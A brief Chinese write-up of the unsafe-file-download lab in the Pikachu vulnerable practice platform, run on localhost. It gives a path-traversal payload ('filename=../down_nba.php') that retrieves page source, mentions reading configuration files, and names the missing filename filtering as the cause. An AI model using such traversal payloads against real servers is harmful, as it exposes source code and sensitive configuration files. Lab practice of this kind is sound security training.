任意点击一个图片进行下载,发现下载的url。
http://127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=kb.png
构造payload:
即可下载 当前页面的源码,可以进行路径穿越来下载一些重要的配置文件来获取信息。
http://127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=kb.png
http://127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=../down_nba.php
漏洞的根本是没有对 filename 来进行过滤。